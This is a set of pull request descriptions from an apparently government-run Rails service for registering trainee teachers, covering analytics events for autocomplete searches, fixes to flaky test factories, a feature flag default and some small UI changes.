- `trackSearch`, called with the user's search query. Adds the query to an array
- `sendTrackingEvent`, called with the user's final selection (if present) and the name of the field. This function:
- Trims down the array of queries (we don't want to send every key press)
- Pushes the data to the `dataLayer`, triggering an event `autocomplete-search` in GTM
- Empties the array of searches
Check out the guidance in https://github.com/DFE-Digital/register-trainee-teachers/pull/1224 for getting this to run locally. With the …

[2482] Send GTM event to track failed autocomplete searches

---

spec/factories/trainees.rb
spec/lib/dttp/params/placement_assignment_spec.rb

https://trello.com/c/Es1CJDlC/2605-fix-flakey-placement-params-test
The trait `:with_bursary` was sometimes setting the trainee to have a schools route, but the trainee had no lead school. Hence creating the placement params would error.
This explicitly sets the trainee and bursary to be a provider-led bursary.

[2605] Fix flakey test

---

spec/factories/trainees.rb

https://trello.com/c/7E2HQu90/2499-fake-trns-arent-realistic
Example data was using factory to generate fake trn number. Factory had a uuid instead of ~~9~~ 7 digit number. 
Changed factory trait to make trn a ~~9~~ 7 digit number as requested in ticket

[2499] Change fake TRN number

---

config/settings.yml
config/settings/development.yml
config/settings/production.yml
config/settings/qa.yml
config/settings/review.yml
config/settings/sandbox.yml
spec/factories/trainees.rb
spec/features/end_to_end/pg_teaching_apprenticeship_journey_spec.rb
spec/forms/trn_submission_form_spec.rb
spec/support/shared_examples/rendering_the_funding_section.rb

The show_funding feature is on now in production. 
Set it to default on in the base settings.yml to ensure it is enabled in all environments.
This is a bit difficult to test. Check that there aren't any rogue overrides to the default settings.yml. After deployment ensure that the funding section is visible on each env.

[xxx] Default show_funding to true

---

app/views/trainees/apply_applications/confirm_courses/show.html.erb

- [This trello ticket](https://trello.com/c/tqZ5cnU3/2636-snag-back-link-on-confirm-course-details-page-behaving-weirdly)
- Added a standard `DynamicBacklink` to the `confirm course details` show page. This shows up as `Back to draft record`
- Go to an apply draft trainee. 
- Click on course details
- See and use the backlink at the top of the page

[2636] Added dynamic backlink to the confirm courses page

---

spec/factories/trainees.rb

Flaky spec gets triggered at `rspec ./spec/features/form_sections/teacher_training_data/edit_course_details_spec.rb:49`
Added two commits, one to reproduce the failure consistently, and the second to fix the flake.

Fix flaky spec in edit_course_details_spec

---

app/components/apply_applications/trainee_data/view.html.erb
app/components/apply_applications/trainee_data/view.rb
app/components/sections/view.rb
app/controllers/trainees/apply_applications/trainee_data_controller.rb
app/forms/apply_applications/trainee_data_form.rb
app/views/trainees/apply_applications/trainee_data/edit.html.erb
spec/components/apply_applications/trainee_data/view_preview.rb
spec/components/apply_applications/trainee_data/view_spec.rb

- [This trello ticket](https://trello.com/c/RdaLgDjk/2635-snag-trainee-data-summary-card-not-shown-even-after-complete)
- The edit page was rendered entirely inside of the `TraineeData::View` component, even parts that were specific to the edit page.
- I moved the edit page specifics out of the component so we can render the summary cards in the trainee record
- When `I have reviewed this section` has been ticked, `progress_tracker` for `trainee_data` was also updated to true
- Make sure an Apply Draft Trainee has their trainee data section completed, and ticked with `I have reviewed this section`
- Then go to the check-details section and you will see the summary card(s) of the trainee data section in that view.

[2635] snag trainee data summary card not shown even after complete
